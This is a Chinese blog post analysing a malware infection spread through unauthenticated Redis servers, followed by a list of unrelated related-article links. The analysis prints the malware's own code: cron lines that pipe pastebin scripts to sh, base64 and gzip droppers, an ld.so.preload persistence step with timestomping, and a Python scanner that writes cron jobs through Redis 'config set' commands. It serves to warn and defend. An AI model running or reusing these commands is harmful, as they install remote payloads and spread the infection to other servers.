起因

偶然间发现redis里有一个陌生key:tightsoft,它的值是:*/1 * * * * root curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh

看key名就知道这肯定不是我们存的,再看value我警觉了,这是要定时执行脚本啊。

分析

于是我便开始逐层拨开它的面纱,脚本的内容是来源于https://pastebin.com/raw/xbY7p5Tb,把它下载到本地后查看是这样的:

/usr/bin/curl -fsSL https://pastebin.com/raw/XqwCz5rc|base64 -d > /bin/ntpder && chmod 755 /bin/ntpder && /bin/ntpder && rm -rf /bin/ntpder

又是一层远程下载并执行脚本,不过这次是加密的,脚本的意思是从https://pastebin.com/raw/XqwCz5rc下载base64编码后的脚本然后再还原,再写入到/bin/ntpder并执行,最后删除掉/bin/ntpder。

https://pastebin.com/raw/XqwCz5rc还原后的代码片段是这样的:

#!/bin/sh

skip=44

tab='   '

nl='

'

IFS=" $tab$nl"

umask=`umask`

umask 77

gztmpdir=

trap 'res=$?

  test -n "$gztmpdir" && rm -fr "$gztmpdir"

  (exit $res); exit $res

' 0 1 2 3 5 10 13 15

if type mktemp >/dev/null 2>&1; then

  gztmpdir=`mktemp -dt`

else

  gztmpdir=/tmp/gztmp$$; mkdir $gztmpdir

fi || { (exit 127); exit 127; }

gztmp=$gztmpdir/$0

case $0 in

-* | */*'

') mkdir -p "$gztmp" && rm -r "$gztmp";;

*/*) gztmp=$gztmpdir/`basename "$0"`;;

esac || { (exit 127); exit 127; }

case `echo X | tail -n +1 2>/dev/null` in

X) tail_n=-n;;

*) tail_n=;;

esac

if tail $tail_n +$skip <"$0" | gzip -cd > "$gztmp"; then

  umask $umask

  chmod 700 "$gztmp"

  (sleep 5; rm -fr "$gztmpdir") 2>/dev/null &

  "$gztmp" ${1+"$@"}; res=$?

else

  echo >&2 "Cannot decompress $0"

  (exit 127); res=127

fi; exit $res

从这里开始是二进制的gzip打包后的数据

脚本的大概意思是将它后面附加的gzip解压得到另一个脚本文件并执行,解压后的代码片段为:

#!/bin/bash

SHELL=/bin/sh

PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

function kills() {

rm -f /tmp/kworkerds /bin/kworkerds /bin/config.json

netstat -anp | grep 69.28.55.86:443 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill

此处省略若干行...,用于清理之前的进程及文件

}

//保障被杀后还能再次执行

function system() {

        if [ ! -f "/bin/httpdns" ]; then

                curl -fsSL https://pastebin.com/raw/698D7kZU -o /bin/httpdns && chmod 755 /bin/httpdns

                if [ ! -f "/bin/httpdns" ]; then

                        wget  https://pastebin.com/raw/698D7kZU -O /bin/httpdns && chmod 755 /bin/httpdns

                fi

                if [ ! -f "/etc/crontab" ]; then

                        echo -e "0 2 * * * root /bin/httpdns" >> /etc/crontab

                else

                        sed -i '$d' /etc/crontab && echo -e "0 2 * * * root /bin/httpdns" >> /etc/crontab

                fi

        fi

}

//这是病毒的核心代码,下载的是一个二进制的可执行文件,里面干了什么就得得而知了

function top() {

        if [ ! -f "/usr/local/lib/libntp.so" ]; then

                curl -fsSL http://thyrsi.com/t6/365/1535595427x-1404817712.jpg -o /usr/local/lib/libntp.so && chmod 755 /usr/local/lib/libntp.so

                if [ ! -f "/usr/local/lib/libntp.so" ]; then

                        wget http://thyrsi.com/t6/365/1535595427x-1404817712.jpg -O /usr/local/lib/libntp.so && chmod 755 /usr/local/lib/libntp.so

                fi

        fi

        if [ ! -f "/etc/ld.so.preload" ]; then

                echo /usr/local/lib/libntp.so > /etc/ld.so.preload

        else

                sed -i '$d' /etc/ld.so.preload && echo /usr/local/lib/libntp.so >> /etc/ld.so.preload

        fi

        touch -acmr /bin/sh /etc/ld.so.preload

        touch -acmr /bin/sh /usr/local/lib/libjdk.so

        touch -acmr /bin/sh /usr/local/lib/libntp.so

}

//这是用python写的一段脚本,用于传播到其它机器

function python() {

        nohup python -c "import base64;exec(base64.b64decode('I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CgpkPSAnaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L25ZQnB1QXhUJwp0cnk6CiAgICBwYWdlPWJhc2U2NC5iNjRkZWNvZGUodXJsbGliLnVybG9wZW4oZCkucmVhZCgpKQogICAgZXhlYyhwYWdlKQpleGNlcHQ6CiAgICBwYXNz'))" >/dev/null 2>&1 &

        touch /tmp/.tmp

}

此处省略若干行...

后面还有下载运行、版本更新等功能,就不一一展开了

重点说一下redis传播这块,希望大家能提高警戒,上面python那一段也是先base64解码后再执行,也是二层下载,中间层就不说了,最终展开后的代码是这样的:

#! /usr/bin/env python

#coding: utf-8

import threading

import socket

from re import findall

import httplib

IP_LIST = []

class scanner(threading.Thread):

    tlist = []

    maxthreads = 100

    evnt = threading.Event()

    lck = threading.Lock()

    def __init__(self,host):

        threading.Thread.__init__(self)

        self.host = host

    def run(self):

        try:

            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

            s.settimeout(5)

            s.connect((self.host, 6379))

            s.send('set tightsoft "\\n\\n\\n*/1 * * * * root curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\\n\\n\\n"\r\n')

            s.send('config set dir /etc/cron.d\r\n')

            s.send('config set dbfilename root\r\n')

            s.send('save\r\n')

            s.close()

        except Exception:

            pass

 此处省略若干行...

它尝试连接没有设置密码的redis服务器,并写入一个key tightsoft, 至此就找到了这个key产生的原因,至少咋来的,可能是通过其它机器感染的就不知而知了。

记一次redis病毒分析笔记的更多相关文章

  1. Redis:学习笔记-02

    Redis:学习笔记-02 该部分内容,参考了 bilibili 上讲解 Redis 中,观看数最多的课程 Redis最新超详细版教程通俗易懂,来自 UP主 遇见狂神说 4. 事物 Redis 事务本 ...

  2. 【转载】Instagram架构分析笔记

    原文地址:http://chengxu.org/p/401.html Instagram 架构分析笔记 全部 技术博客 Instagram团队上个月才迎来第 7 名员工,是的,7个人的团队.作为 iP ...

  3. ReentrantReadWriteLock源码分析笔记

    ReentrantReadWriteLock包含两把锁,一是读锁ReadLock, 此乃共享锁, 一是写锁WriteLock, 此乃排它锁. 这两把锁都是基于AQS来实现的. 下面通过源码来看看Ree ...

  4. Redis:学习笔记-03

    Redis:学习笔记-03 该部分内容,参考了 bilibili 上讲解 Redis 中,观看数最多的课程 Redis最新超详细版教程通俗易懂,来自 UP主 遇见狂神说 7. Redis配置文件 启动 ...

  5. Redis:学习笔记-01

    Redis:学习笔记-01 该部分内容,参考了 bilibili 上讲解 Redis 中,观看数最多的课程 Redis最新超详细版教程通俗易懂,来自 UP主 遇见狂神说 1. Redis入门 2.1 ...

  6. 3.View绘制分析笔记之onLayout

    上一篇文章我们了解了View的onMeasure,那么今天我们继续来学习Android View绘制三部曲的第二步,onLayout,布局. ViewRootImpl#performLayout pr ...

  7. 4.View绘制分析笔记之onDraw

    上一篇文章我们了解了View的onLayout,那么今天我们来学习Android View绘制三部曲的最后一步,onDraw,绘制. ViewRootImpl#performDraw private ...

  8. 2.View绘制分析笔记之onMeasure

    今天主要学习记录一下Android View绘制三部曲的第一步,onMeasure,测量. 起源 在Activity中,所有的View都是DecorView的子View,然后DecorView又是被V ...

  9. 1.Android 视图及View绘制分析笔记之setContentView

    自从1983年第一台图形用户界面的个人电脑问世以来,几乎所有的PC操作系统都支持可视化操作,Android也不例外.对于所有Android Developer来说,我们接触最多的控件就是View.通常 ...

随机推荐

  1. pyspider 启动错误遇到的一些坑

    https://blog.csdn.net/SiHann/article/details/88239892 突然接到一个项目是关于pyspider,遇到了一些小坑,百度一下发现并没有很好的解决所以研究 ...

  2. Redis基础、应用、第三方支持组件总结

    这段时间一直在研究学习Redis的相关知识,现在大概做下总结吧首先,Redis的基础方面,不说配置,就单单说下Redis数据类型:Redis 五大数据类型有String 类型,Hash 类型,List ...

  3. C# JSON 转换

    // using System.Web.Script.Serialization; var jser = new JavaScriptSerializer(); var json = jser.Ser ...

  4. 彻底理解this 的值到底是什么?

    作者:方应杭 来源:知乎 你可能遇到过这样的 JS 面试题: var obj = { foo: function(){ console.log(this) } } var bar = obj.foo ...

  5. Standford CoreNLP使用

    1.官网https://stanfordnlp.github.io/CoreNLP/ 2. 待续...

  6. 第13届景驰-埃森哲杯广东工业大学ACM程序设计大赛.B.跳一跳,很简单的(Hash 倍增)

    题目链接 首先变换的周期是\(26\),而所有字符是同时变的,所以一共就只有\(26\)种树,我们对\(26\)棵树分别处理. 求某节点到根路径上的字符串,可以从根往下哈希,\(O(n)\)预处理出. ...

  7. Mybatis的延迟加载和缓存

    1. MyBatis中的延迟加载,也称为懒加载,是指在进行关联查询时,按照设置延迟加载规则推迟对关联对象的select查询.延迟加载可以有效的减少数据库压力.       注意:MyBatis的延迟加 ...

  8. 32位系统和x86的关系?

    32位操作系统针对32位CPU设计,cpu的位是指一次性可处理的数据量是多少,也等于寻址空间的大小或是通用寄存器的大小,一般数据总线的宽度也和cpu位数相同,但也有例外(如8088数据总线宽度为8然而 ...

  9. yii2 数据提供者 dataProvider

    数据提供者 dataProvider $dataProvider = new ActiveDataProvider([ 'query' => $query, // 如何来取得数据 'pagina ...

  10. swal() 弹出层的用法

    swal()方法是一个提示框: swal({ title: "", text: "请扫描用户手机上的付款码", type: "input", ...